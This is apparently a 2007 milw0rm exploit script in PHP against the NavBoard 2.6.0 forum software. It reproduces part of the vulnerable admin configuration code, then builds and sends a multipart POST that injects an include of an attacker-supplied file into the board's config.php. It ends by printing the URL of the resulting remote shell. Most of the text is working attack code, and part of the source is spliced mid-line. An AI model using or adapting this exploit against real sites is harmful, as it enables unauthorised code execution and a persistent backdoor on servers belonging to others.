";
print "Max total size of pms per user (bytes) ";
print "
";
print " ";
print "
";
print "Max total number of pms per user ";
print "
";
print " ";
print "
";
print "Board Closing";
print "
";
print "Entering info here will cause the entire bulletin board to be closed ";
print "This is the message that shows up when the board is closed ";
print "
";
print " ";
print "
";
print "";
print "";
print "
";
print "";
print "
";
print "";
}
if($editconfig){
$boardtitle=stripslashes($boardtitle);
$boardtitle=htmlentities($boardtitle);
writedata("$maindatadir/config.php",$boardtitle,0);
writedata("$maindatadir/config.php",$threadperpage,7);
writedata("$maindatadir/config.php",$postperpage,8);
writedata("$maindatadir/config.php",$avatarfilesize,9);
writedata("$maindatadir/config.php",$avatardimension,10);
writedata("$maindatadir/config.php",$defaulttheme,12);
writedata("$maindatadir/config.php",$inactivityseconds,13);
if($html=="on"){
writedata("$maindatadir/config.php","allowhtml",14);
}else{
writedata("$maindatadir/config.php","denyhtml",14);
}
writedata("$maindatadir/config.php",$maxcharsbody,18);
writedata("$maindatadir/config.php",$maxcharssigs,19);
if($gzcompress=="on"){
writedata("$maindatadir/config.php","enablegz",21);
}else{
writedata("$maindatadir/config.php","disablegz",21);
}
writedata("$maindatadir/config.php",$allowedattachext,22);
writedata("$maindatadir/config.php",$maxattachsize,23);
writedata("$maindatadir/config.php",$maxpolloptions,24);
writedata("$maindatadir/config.php",$maxcharssubject,25);
writedata("$maindatadir/config.php",$maxsubforumdisplay,27);
writedata("$maindatadir/config.php",$buddylistmax,28);
writedata("$maindatadir/config.php",$maxpmsize,29);
writedata("$maindatadir/config.php",$maxpmnumber,30);
writedata("$maindatadir/config.php",$maxtotalattachsize,31);
writedata("$maindatadir/config.php",$allowdupdisplay,32);
writedata("$maindatadir/config.php",$defaulttime,33);
writedata("$maindatadir/config.php",$textlogo,34);
writedata("$maindatadir/config.php",$adminemail,35);
writedata("$maindatadir/config.php",$mainwebsite,36);
writedata("$maindatadir/config.php",$postfloodcontrolsec,37);
writedata("$maindatadir/config.php",$regfloodcontrolsec,38);
writedata("$maindatadir/config.php",$registration,39);
writedata("$maindatadir/config.php",$boardclosing,40);
writedata("$maindatadir/config.php",$displaychange,41);
if($configarray[42]!=="on"&&$dontscanreplycount=="on"){//if turning on for first time, make a recount
for($n=0;$n 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=7; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
/*Data*/
$data.='-----------------------------7d6224c08dc
Content-Disposition: form-data; name="editconfig"
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="boardtitle"
Dj7xpl
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="threadperpage"
www\";include \"\$shell\";\/\/
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="postperpage"
Dj7xpl
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="avatarfilesize"
11
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="avatardimension"
123
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="defaulttheme"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="inactivityseconds"
#CCFF00
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="html"
on
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxcharsbody"
111
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxcharssigs"
11122
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="gzcompress"
on
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="allowedattachext"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxattachsize"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxpolloptions"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxcharssubject"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxsubforumdisplay"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="buddylistmax"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxpmsize"
Dj7xpl
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxpmnumber"
Dj7xpl
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxtotalattachsize"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="allowdupdisplay"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="defaulttime"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="textlogo"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="adminemail"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="mainwebsite"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="postfloodcontrolsec"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="regfloodcontrolsec"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="registration"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="boardclosing"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="displaychange"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="replies"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="dontscanreplycount"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="nestedbbcodes"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="indentspacing"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="userlevelnames"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="showalledits"
red
-----------------------------7d6224c08dc
';
/*Echo Header*/
echo "[!] NavBoard 2.6.0\r\n";
echo "[!] Powered By Y! Underground Group\r\n";
echo "[!] Vuln And Coded By Dj7xpl\r\n";
/*Sending Data*/
$packet ="POST ".$path."admin_config.php HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacket($packet);
sleep(2);
Echo "[!] Shell : http://".$host.$path."data/config.php?shell=Evil Text\r\n";
?>
# milw0rm.com [2007-05-23]